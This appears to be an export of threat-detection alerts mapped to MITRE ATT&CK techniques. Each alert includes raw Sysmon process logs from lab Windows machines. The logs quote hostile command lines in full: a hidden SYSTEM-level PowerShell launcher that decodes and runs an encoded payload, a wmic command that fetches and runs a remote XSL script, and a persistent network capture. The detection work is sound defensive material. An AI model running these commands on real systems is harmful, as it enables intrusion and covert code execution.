10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace show status + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9808 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.965 + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4945 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.245 + 747F3D96-6646-5D3F-0000-0010E32E8B00 + 5084 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9807 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.949 + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-2586-5CC9-0000-0010DC530000 + 460 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311373 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:01:03.894 + 747F3D96-939F-5F07-0000-0010888E4600 + 7456 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-86FA-5F07-0000-00204A8B0600 + 0x68b4a + 2 + Medium + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-86FC-5F07-0000-00101E4B0700 + 2356 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4941 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:54.044 + 747F3D96-6642-5D3F-0000-0010F69D8A00 + 4896 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966388 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:27.697 + 365ABB72-55D7-5C91-0000-001067BD0700 + 2236 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 